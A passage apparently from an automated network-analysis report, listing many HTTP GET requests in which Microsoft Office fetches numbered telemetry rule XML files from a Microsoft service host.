          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
